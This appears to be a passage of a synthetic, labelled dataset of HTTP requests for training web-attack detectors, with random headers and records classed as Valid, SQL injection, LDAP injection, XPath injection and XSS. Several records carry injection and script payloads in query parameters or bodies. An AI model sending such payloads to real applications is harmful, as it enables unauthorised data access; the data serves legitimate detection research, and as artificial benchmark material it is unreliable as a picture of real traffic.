Referer: /gnrtr/r9In6l8/arne23ol/4hInh7u/bthyxaoe.gif
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: a4fdei (eFtCQ0Ri)
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: 8.7 www.rcaca.jpg, 0.0 www.asyp.png, FTP/8.1 170.237.121.148
Transfer-Encoding: identity
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 865 www.coRthr.shtml "oCpstedTscbho" "Thu, 07 Dec 06 06:32:02 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tn4ridzhDdc3=7&o9yey9uah=o87QAi8&mtd7Vqo6N3=o7uJzER&Iio81MOHyJ=aodtufm=h-lp6stylei(&rcemr0Ju2=relo

End - Id: 4786
Start - Id: 41515
class: SqlInjection
POST /tttwenuieokilei/oamunhfn1rghE4o.jpeg? HTTP/1.1
Content-Length: 261
Content-Language: u0Itod7
Content-Encoding: compress
Content-Location: http://raoln5.org/4tns/td3nagph/twth.avi
Content-MD5: c3RvbnRpbnNUamFyYWhlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Nov 09 17:26:35 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: 65.153.235.145:80
Connection: keep-alive
Accept: audio/*, image/*;q=0.2, image/*
Accept-Charset: utf-7, windows-1257, macintosh;q=0.3, iso-8859-4;q=0.4
Accept-Encoding: *
Accept-Language: i-N9iou, ip-tn;q=0.5, s2-rgdcl, e-Ii;q=0.3, saaa-th
Cache-Control: no-cache
Client-ip: 3.75.152.42
Cookie: eeEW=i05j.;Ssreclt=p_m4V;oro4klislShp= h
Cookie2: $Version="3"
Date: Wed, 20 Jul 05 18:57:58 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Tue, 18 Jan 05 21:56:07 CET
If-Unmodified-Since: Tue, 15 Dec 09 12:46:48 GMT
If-Match: "gIlzy-qb8CZSvls5F-FS"
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: Thu, 28 Jun 07 23:34:43 UTC
Max-Forwards: 13
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic aEFyMzpVc2cwYm4=
Range: -507151,-0092
Referer: /4ertapSf/tMeafai.dll
TE: chunked,chunked,trailers
Trailer: User-Agent
User-Agent: ni6eeifsoarNaesrE
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: aMeig3/4.7 www.edelerkf.png, 0.7 179.93.126.143:9, naa/7.5 www.IeGes.html:6832
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rI5d2=sswdTQheHc&GEmaexecxjqiH=062731671&rmyauta9yDi=vid&2itsao4ss=tseRods&17=|[osv&mbgsound69AlWeWFL=ie&geevlcmO=chQywd&l6sioxa=t3Kzq&SNUE=iEregr2n&il='     or    id  in    (     select  *     from      user_db     )&asEIueemag=60QB_1.aOGE&vZBoP=oyr5

End - Id: 41515
Start - Id: 22305
class: Valid
GET /Mw@oBhttptP4nupdateJQcopy/1eFamTtfilGtene9astz/1hpepyomalwacnrqnai/YuS/tZLNofeKIoaaXTk0_BOU/uaErhs/xtermYadminboot.iniwindow.open9getc3.sh?QOM6uls=hr+t&EBix=%7Ctwhere%27&qeprthrnescrar=eeinput&ybarAo=842834&2aasotehh=17 HTTP/1.0
Host: www.skxske.fr
Connection: keep-alive
Accept: text/*;q=0.2
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: ietErir-ucn
Cache-Control: no-cache
Client-ip: 130.148.29.214
Cookie: rap=9;dnwhonoe9=azz
Cookie2: $Version="00"
Date: Tue, 02 Aug 05 10:41:32 GMT
ETag: "Q6r-.ZHASE_U9EZ2b"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Thu, 09 Jul 09 24:53:38 GMT
If-Unmodified-Since: Thu, 09 Nov 06 07:05:03 UTC
If-Match: "1TySx0BfA0iqQuVpJi9"
If-None-Match: *
If-Range: Fri, 17 Dec 04 15:55:50 CET
Max-Forwards: 32
MIME-Version: 7.8
Pragma: noik='xttorSrE'
Proxy-Authorization: NTLM Z3A1dE8wdEh0YW9mb2RhZWE0czdlczZjODMyQ290cnRtYTF0NHc=
Authorization: NTLM OWRybjNlT3ppaDlUb25lcm9mOGxpbGN4ZWltb2hySW1jaDBpcGhzZWFnbG5sZQ==
Range: 394544-569495,98730-
Referer: http://www.ehuedhr.st/hoit/zeTnot/rht3btoB.jsp
TE: chunked;q=0.0,gzip
Trailer: Host
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 2.5; oq-bn; rv:2.7.8) Gecko/35600968
UA-CPU: Sparc
UA-Disp: 730,116,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6713x3375
Via: 7.5 www.faorntit.js, 7.9 153.76.135.117, 0.6 www.ercxt.html
Transfer-Encoding: deflate
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 843 www.adohsb.htm "WSAE4akma" "Sun, 13 Aug 06 21:26:39 GMT"
X-Forwarded-For: 111.239.10.121
X-Serial-Number: 35178476793
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22305
Start - Id: 14488
class: Valid
GET /teieetaein2tti/bmrdlrbos1O/dhnmIXtxAQV5cQE/_JpSx1jSftp1O9TT/aX/neyE5bSEXe.6G/nrO7d5rJ1yQO1@/eolcAOWRotcVP/FOJuhome6iGCEq1jil/ulmsdrefbn2a/HDYabQi/aL-TVU.twwW7ktMXV_S5.css? HTTP/1.1
Host: 190.220.177.92:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: compress, identity, identity, deflate
Accept-Language: np7to5nf-eEjEI0u;q=0.0
Cache-Control: max-age=968
Client-ip: 156.195.173.2
Cookie: q7Ghco=nih;30sm=52416403
Cookie2: $Version="838"
Date: Sun, 17 Sep 06 07:02:44 GMT
ETag: "QU9.rjcLWw9yyUMa"
Expect: ulijiif
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sun, 03 Jan 10 01:33:21 GMT
If-Unmodified-Since: Fri, 18 Nov 05 23:18:44 CET
If-Match: *
If-None-Match: *
If-Range: "2@GqrPRgIWaXdZhj"
Max-Forwards: 29
MIME-Version: 5.4
Pragma: nxtn='e9tiot'
Proxy-Authorization: NTLM ZW1mZWlhY3VteWZsYUlod3Nzc3ZrdGdyZ09sZWRnSWl0bA==
Authorization: Basic SDkyY3NySWY6dWxpa3R0OA==
Range: 737195-
Referer: /sRhk/eent/naotTn.dll
TE: chunked;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (X11; U; Linux i586 0.4; cr-os; rv:2.5.0) Gecko/31266245
UA-CPU: 68000
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2304x0310
Via: 5.6 93.84.88.73, 7.3 244.102.36.154, e3i7ve/8.4 2.249.99.39
Transfer-Encoding: gzip
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 474 www.anislbri.html "nTdethnvs" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 58967727839058915929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14488
Start - Id: 18726
class: Valid
GET /esm4rhwuncSonewpuio/5YZdWX/A@connecteXNq1/uophhkidrmrnn9/pscm/rD8JgKiRs9VJNlMcHVBF/o.WTHqo6o/mP@MHT8JB/baa3/De92lEgnt4yieo.jsp?ReEvwt=copyr+f&XSSk=896995&mtn7ev=alpD%29etuexmlsw5%3Dx&1Yn8ahSaca=7395990&lrkrTngno=29745&BftpQWroMf8E=419 HTTP/1.0
Host: www.s1Hhsmu.cz:81
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.5, windows-1255, windows-1254;q=0.4
Accept-Encoding: identity;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 151.170.233.194
Cookie: ifdega= elot'il5+ pnupdateexecarrwgeti
Cookie2: $Version="3"
Date: Sun, 18 Feb 07 17:12:25 CET
ETag: W/"zvnk41a5Tn4k1k8ZK"
Expect: 100-continue
From: s9urn@T3rE4ome.com
If-Modified-Since: Tue, 18 May 04 13:01:36 CET
If-Unmodified-Since: Sun, 16 Jan 05 08:40:51 CET
If-Match: "Ri7Pxq3kjvApAtr"
If-None-Match: "14jPhIGBwewGJMwvntOp"
If-Range: *
Max-Forwards: 4
MIME-Version: 0.0
Pragma: fbc='E8'
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: u4eer tiwaj=tTpura8
Range: -0
Referer: /oo51ju.mdb
TE: gzip;q=0.3,gzip,gzip;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 2.7; Nn-De; rv:4.5.2) Gecko/10902846
UA-CPU: MIPS
UA-Disp: 752,4892,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4616x9503
Via: 7.5 www.tder1h.js, 1.5 107.187.118.109, 1.3 www.momcltoF.gif
Transfer-Encoding: gzip
Upgrade: ayiai/8.8, ryiyaS/1.2
Warning: 283 96.43.133.65:48460 "eUam8fnoeiuksnontNn" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18726
Start - Id: 17511
class: Valid
GET /tlou/rgeIi-5e.VVdR/d.naVtQTYSIcwzJ/rdcjh9n5tXBd/mgtntkw/iew0O.aspx? HTTP/1.1
Host: 241.173.212.176
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, windows-1250;q=0.9, iso-8859-4;q=0.5, windows-1258;q=0.7, euc-cn
Accept-Encoding: *
Accept-Language: toewhtlr-resnsnr;q=0.7
Cache-Control: oTmsde0='nte'
Client-ip: 252.240.14.144
Cookie: cAfntwdaratyii=iy-;Pe=l5];s]ra4 a;ayhjt4o=rolAEpfjmeychzat;2narrh=e9z
Cookie2: $Version="17"
Date: Mon, 11 Jun 07 11:00:25 UTC
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: ettaoe@hoaeEoNn5.it
If-Modified-Since: Mon, 22 Jan 07 10:17:57 GMT
If-Unmodified-Since: Tue, 04 Nov 08 12:07:36 UTC
If-Match: "XRqK4Jk7tUJHaKE_s7"
If-None-Match: "GCQhOAP@uc4lJCOg"
If-Range: Fri, 27 Feb 09 20:25:13 UTC
Max-Forwards: 1
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest nc=Fd5bd314
Range: 8940-,0923-,5121-
Referer: http://www.aetvie.be/asrmk/bh4hjv/HKe1e1ao.mdb
TE: trailers,deflate,trailers
Trailer: Date
User-Agent: Mozilla/6.5 (X11; U; SunOS sun4u 8.7; du-se; rv:0.0.2) Gecko/95312844
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 936x088
Via: 9.5 178.247.106.96, FTP/6.2 www.tNievO.png
Transfer-Encoding: compress
Upgrade: wys/9.8, dwn/4.4
Warning: 373 146.38.237.78 "npfieGe" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17511
Start - Id: 15884
class: Valid
GET /LVagroup byxIX/luetTe6Hmda/yacsrnnu/iRyUDJ-KCLHWsRY/ldireoriqkser/raroRg9zra/xeboy2hmvO4otsiSea/n5muOPFw6ONr/whnX8AdX/rXe@Hgf74Z5mB_1YRtO/rnmAJiLbrn.MIPV/kehaD_ihuYhFU.UWQ7x.shtml?eautoexec0ncHg.ijn_H=osreUsi1bv6rrr4R&6BK_pRdOIs=q%7E&3heext=iSidi7fn&rc=3i+%25udbTy&cmnmsfisSsfn=oetfnlnesI&ESJvpmaccept=770291&jg6Lsx=o+rzej&qCupdateu7=ego+Chxsnrs%27&atcl8ihaet=34649699 HTTP/1.1
Host: www.aerhKehsrq.it
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: max-age=7
Client-ip: 197.55.8.188
Cookie: laueryeni=imgncwnlahttpsm&;ir5e2aasmrjaOz=ss4e;i719t=teval2imjlhr%gzn8d;elaste=ee;rrota=7861
Cookie2: $Version="34"
Date: Sat, 09 Oct 04 11:00:10 GMT
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: ks2tnwg@hnreg9rhrn.biz
If-Modified-Since: Fri, 26 Jun 09 23:44:18 UTC
If-Unmodified-Since: Fri, 20 Jun 08 12:51:27 UTC
If-Match: *
If-None-Match: "qmgo6DJL9ZbDJnIYdX"
If-Range: Thu, 30 Aug 07 11:37:17 UTC
Max-Forwards: 4558
MIME-Version: 8.0
Pragma: nzx2=fra3xa
Proxy-Authorization: Digest opaque="lhniHtaa"
Authorization: nRmvw i9Orf9sr=mnaneme
Range: 141-7620
Referer: http://www.stsdE.ch/fedas/rniNe/apamelLm/oapPr/r9As.sh
TE: trailers,deflate;q=0.2
Trailer: Host
User-Agent: eCArT_adG http://www.1naoet.cz
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 664x941
Via: HTTP/4.2 179.94.157.232, FTP/6.4 www.higsmwth.jpg:2
Transfer-Encoding: identity
Upgrade: 5hn4s/0.4, tec/5.7, ry4ia/5.2, 6ik/3.4
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15884
Start - Id: 38942
class: LdapInjection
GET /J8EyJcFOyQ94/tntTUVFxSOWN-JqSXM/e-1p/zXkApogUsQ23Q/yAzcrj1ieo/atj/e0a3qp9cchvsihe.html?8etHooi=htaccesaatwfmtwfgopa&BbKqj1Loptmocha=eaess%28t9he+baood3from+A&D-HEQ7pfIrt=53%29%28%26%28objectClass%3DneH%29%28%7C%28sn%3DMU6%29%28cn%3DriQ+++++J*%29%29&eenaxmqh=uyApSr3ix&rNratore8erskf=2ehaiere&rjnaMakbeo=iHS&tg=54713 HTTP/1.1
Host: 116.9.63.253:0
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 207.127.83.104
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="7"
Date: Thu, 19 Apr 07 10:37:45 GMT
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: LdFns
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 14 Mar 05 02:13:27 GMT
If-Unmodified-Since: Mon, 18 Jul 05 19:19:19 GMT
If-Match: *
If-None-Match: "8b4EsaMoXn.iLGv"
If-Range: Tue, 20 Jan 04 04:59:28 CET
Max-Forwards: 65
MIME-Version: 4.0
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: Basic dG9lcEZxOndjYjR3UlJh
Range: 19115-,-68,486-99
Referer: http://www.4rle6fa.biz/oaewdrwa.mspx
TE: chunked,chunked
Trailer: From
User-Agent: Mozilla/5.7 (compatible; MSIE 2.4; Linux i386; iES0d; lso17o)
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38942
Start - Id: 29436
class: Valid
GET /r_rMtlPkGqUx/awticqaLyoSa36rtn/sC5vLeEP_B87Bt/Utqtsmzawrwr/yabzqwt6fow/NtjzZSlHtsystem/HoX4R/oalfe9vadhtusubenru3/Lstf9tarieiohhatop/z0UneV9XWe6pLe3TJEx/nasex/Tdi2ljnqgeyoeseotns.jpeg?0aolj=ahowWr&eiSso3Nss=ooe9vbscripto&lyhcfo0eoohoec8=positione&gaeodo50clt=123696&Ewposition1SYIMxmlselect=7ioer&ml=ej0Y5NBy&eoteovealder=8includes-emr+fecem%3Bv&opt.Qb=52019&ohm1ep=602&6rcn=sTYInsPF%40R HTTP/1.0
Host: 136.145.238.108:6
Connection: neAuy6
Accept: */*
Accept-Charset: iso-8859-2;q=0.7, koi8, iso-8859-4
Accept-Encoding: gzip;q=0.1, identity
Accept-Language: xpanizne-9Iwo, nni-irnety2;q=0.1
Cache-Control: no-cache
Client-ip: 28.137.249.243
Cookie: rSc1tltH1mrdt=eOio;toDwhnat4t=Ogsoas9;ae=xt9DettdenyjHou;terd4tdea8=omuos
Cookie2: $Version="346"
Date: Sun, 18 Jan 04 03:03:21 GMT
ETag: W/"8qflqO6uDAIjbMu19u4j"
Expect: e4skeya=nemhrRk;zegybsow
From: neroa@r4ln7hredo.cz
If-Modified-Since: Tue, 27 Jun 06 14:08:26 CET
If-Unmodified-Since: Fri, 09 Apr 10 23:57:47 UTC
If-Match: "UEpnljU..Bx5rp6X"
If-None-Match: "rrS3BjWA@S2.hlU.Wa0f"
If-Range: *
Max-Forwards: 214
MIME-Version: 6.5
Pragma: hyp='ape0sao'
Proxy-Authorization: Basic cm9zbjRkcDpyczM3c2FoZQ==
Authorization: Digest response="fFB9D3bde0Db6f4D2A3D76bA55B0bB2E"
Range: 6527-0267
Referer: http://www.a5loxbt.com/yar4t/ena6/ixo0o/trq7.gif
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.5 (X11; U; Unix 7.1; oa-tE; rv:3.4.1) Gecko/35976844
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7858x401
Via: 3.6 www.nm5aDn.png:258, HTTP/5.6 www.aItonch.tiff:38349, 4.3 www.nZidEshk.shtml
Transfer-Encoding: identity
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 58149982680472184
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29436
Start - Id: 9947
class: Valid
GET /r5mglas/pZ745J-gj/8aqttDaUgDqks7/geiuydseINiyejwIo/sV/rcpg_chr@CXn.htm?end1esToisiirrT=94883&_tmpEDvaccepto_=+elMeag%3Fth&qo=3202&antsi6otse=702787&xoaVra=uthtq&XCFN5v0vHm2-=Rrtysyg&Nemzrlimv5=J%2Bs%3A+&ar=yVUEFn&6ey4compMpd=w&ilveSo4bdeMYghc=53808430&y7e=npKowhf3%40 HTTP/1.1
Host: 214.10.26.131:35515
Connection: keep-alive
Accept: application/*;q=0.7, video/mpeg;q=0.9, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: el9I5-gSEcrWn;q=0.1, 9-ec;q=0.9, uts-hgtsev
Cache-Control: max-age=397
Client-ip: 52.145.216.151
Cookie: 4Ptcx332rwto=7690757
Cookie2: $Version="885"
Date: Thu, 26 Aug 04 18:30:02 CET
ETag: W/"PW@SOkgZPzXc29Dr"
Expect: 6gsnqtd=tpwi0d
From: snyou@r8tka9etrf.de
If-Modified-Since: Sun, 29 Feb 04 14:05:54 GMT
If-Unmodified-Since: Tue, 29 May 07 16:08:15 UTC
If-Match: "isefntLp6v-OuOCpy"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlobGZlNnJyc2FlaTBiczhiOFJyYWxhbHNwdGVzdXQydEF5RXR5ZQ==
Authorization: NTLM dGlHd2VudHlkM3p0dDh0c0NzdGl3b2VEb2JvOWdTdjltaHBpYXRnNG1OYWFrcmg=
Range: -96
Referer: /ylun/rcgbu.swf
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/8.0 (compatible; Konqueror/9.6; SunOS sun4u; e9oAi; tRhnyden3E)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 596x007
Via: FTP/7.7 www.unwe.shtml, 5.9 177.2.7.144
Transfer-Encoding: deflate
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 335 216.175.93.201 "tnhedoshTilnhmYf" 
X-Forwarded-For: 126.125.147.228
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9947
Start - Id: 14463
class: Valid
GET /ldcobQwKJJsDhpl/9legrsdiao8h4.swf?nstgttmuei0sE=omMd95nket&zfnsIshlrE6n=5372796&GvBfBKDfTW=tV5TkL2_33&td4ims3pitfv=mghasAdtom3t&gn=epriO&enhds=vyt1rlpluwindow.open0qte HTTP/1.1
Host: www.aIoTobmicx.cz
Connection: keep-alive
Accept: video/*;q=0.5, text/*;q=0.2
Accept-Charset: iso-8859-4;q=0.2, iso-10646-ucs-2;q=0.4, iso-8859-3;q=0.8, iso-10646-ucs-2;q=0.3, utf-7;q=0.5
Accept-Encoding: gzip;q=0.4, compress;q=0.4, gzip;q=0.5, deflate, compress;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 133.235.242.211
Cookie: anedcpbSe=tmW1OOau6;sp7Rdzclearsr=ektGieTs;ciaEttyetbiSF=tmph;VU340.YOHY=Z7horaae5k6h ;ifeeorrjcto=997622365
Cookie2: $Version="0"
Date: Sun, 13 Jun 04 07:20:06 GMT
ETag: W/"Sl5_BsZ.S8Td04VnZ"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Sat, 03 Jun 06 01:40:05 GMT
If-Unmodified-Since: Mon, 10 Dec 07 05:34:21 GMT
If-Match: *
If-None-Match: *
If-Range: "KR.Riin5B_@ApL92hI"
Max-Forwards: 079
MIME-Version: 2.3
Pragma: rLs='c'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Basic RGVlaEVyYTpscmNkZQ==
Range: 063-,416644-557318
Referer: /osotqn/suhhGes/mrnEand/maidaa.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/3.3 (compatible; meepni; Win 9x; ih9Natol7)
UA-CPU: 68000
UA-Disp: 6368,730,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 332x177
Via: FTP/6.2 79.223.115.166
Transfer-Encoding: gzip
Upgrade: aMema8/0.0, scr8/9.8, Im2/4.1, yzit/6.6
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14463
Start - Id: 49726
class: XPathInjection
GET /cla.asmx?amTCKsock_streamzBX=m87AK8qAe7d&-5xxrcpvAiBQ=oj1&nee1rnb=475++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++7478%3D&tIF4zt=7164961 HTTP/1.1
Host: www.oeniS.org
Connection: oSiusnDd
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-japanese, windows-1258, macintosh, iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7190
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Tue, 09 Oct 07 01:36:50 CET
ETag: "JYMP4D0.htFnvfn"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Fri, 07 Dec 07 19:25:54 UTC
If-Unmodified-Since: Tue, 08 Dec 09 02:01:09 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -37003,-5,-1
Referer: http://saeg2ly.it/uisof/jignqmru.zip
TE: trailers
Trailer: Via
User-Agent: nseoeIttestul
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49726
Start - Id: 47302
class: XSS
GET /UzryXcXls/aCt9axYrhirtaNntaa/zk-b3BE/demstwrqa86opoo.aspx?3eha=R++r%2Bs+Djegehavingb&qd24oox=%3Cscript++++%3Ealert++++%28ehi6Exr9tlAlols.at1r9%29%3C%2Fscript+++%3E&-AaVZ=00&gase9lkuhlbgK4=2lomeso&onz=document+Erm%3C&jprTzLhiowYe=o7JbmOOOVQs&L-DEQ=17vW6aHGpOty HTTP/1.0
Host: www.mrce.org
Connection: p7eaaosl
Accept: */*
Accept-Charset: windows-1253;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 226.203.48.223
Cookie: pyeklliidsbTRTt=rrrseTemxbodaoozt;ecUt=aota;aUarfp=oeR;0jgujA70RG.V=5852517307
Cookie2: $Version="1"
Date: Sat, 08 Jul 06 09:19:32 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: scSR=iog8
From: told@ol9na.de
If-Modified-Since: Sat, 10 Jun 06 07:57:02 GMT
If-Unmodified-Since: Sat, 23 May 09 21:42:32 UTC
If-Match: *
If-None-Match: "3cnjxstV_I-yQHs"
If-Range: Mon, 05 Oct 09 18:17:20 GMT
Max-Forwards: 2980
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: -40347,67-1
Referer: http://iaicd5fp.gov/affewa.tar.gz
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 8.0; dh-1g; rv:4.1.1) Gecko/25325431
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 9.3 www.asgbtTge.jpeg:898, 9.1 221.28.94.238:09017, 5.5 www.oeEqemc.png
Transfer-Encoding: ahyUR
Upgrade: nPcun/8.0, aNCmem/7.3, aiz/3.2, 5no/1.9
Warning: 444 214.91.5.142:2 "utenrsgvrEdai" 
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47302
Start - Id: 37041
class: LdapInjection
GET /bHeidtoer9iaU6dtn3k.sh?LB2kUNphps=iframedqeYltet%3Drrdrop%28s&7iTe0uTni=2329957&ltLievhalny8=jexmle&atvKmntisputn=trinm+Aa%5Crar8&nwQu9irn=bleeoA0eit&5rD=oU9TB&itpnitotlbeo=1417&e1iueil0t16a=etaneeg5l&Re=a7ee%29%28%7C%28l724%3D*%29&0ecktie0lI1a=ophqnpsjib&5mo8angtnndE=t5nE0koect HTTP/1.0
Host: www.wis7li.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=7343
Client-ip: 188.212.178.172
Cookie: EiyrcoyR4hgnEd=svMI18MYpqg-;sUZ9KMaO=742;w.g@g._Seqs9=2066097;Dzei3cbetiOi=lmqnelnbr;1m7heooy=seaomh0og
Cookie2: $Version="6"
Date: Tue, 15 Mar 05 09:45:22 CET
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Sun, 23 May 04 17:59:34 CET
If-Unmodified-Since: Sat, 04 Feb 06 01:15:15 UTC
If-Match: *
If-None-Match: "xA.HK8rw-qF53ktNCer"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 60
MIME-Version: 3.6
Pragma: Di=h
